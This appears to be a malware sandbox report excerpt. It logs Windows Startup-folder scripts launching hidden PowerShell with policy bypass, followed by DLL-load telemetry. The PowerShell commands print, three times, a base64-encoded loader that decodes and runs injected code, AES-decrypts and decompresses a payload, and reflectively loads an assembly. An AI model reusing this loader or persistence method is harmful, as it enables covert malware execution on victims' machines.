b3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
